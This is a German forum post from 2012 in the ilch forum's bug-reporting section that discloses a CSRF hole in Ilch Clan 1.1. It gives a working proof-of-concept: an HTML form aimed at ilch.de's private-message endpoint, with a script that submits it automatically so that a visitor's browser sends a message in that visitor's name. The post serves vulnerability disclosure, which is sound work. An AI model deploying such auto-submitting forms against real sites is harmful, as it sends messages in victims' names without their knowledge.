• Forum
• Ilch Clan 1.1
• Fehlersuche und Probleme
• CSRF Lücke: Automatisch Mail versenden

ilch Forum » Ilch Clan 1.1 » Fehlersuche und Probleme » CSRF Lücke: Automatisch Mail versenden

1. Mo. 12.03.2012 23:17 Uhr #1

   

   vape Mitglied

   Registriert seit

   11.03.2012

   Beiträge

   5

   Beitragswertungen

   

   Folgender Code ermöglicht es Mails unbemerkt/automatisch versenden zu lassen:
   

   <form action="http://www.ilch.de/index.php?forum-privmsg-new" method="POST" name="form">
   <input name="name" value="vape" /> 
   <input type="text" tabindex="2" maxlength="50" size="40" name="bet" value="titel">
   <textarea name="txt" rows="15" cols="65" tabindex="3">boese nachricht unter falschem namen</textarea>
   <input id="keks" type="submit" tabindex="4" accesskey="s" value="Senden" name="sub">
   </form>
   <script>document.getElementById("keks").click();</script>

   
   
   betroffene Homepage: ilch.de
   0 Mitglieder finden den Beitrag gut.

   • zitieren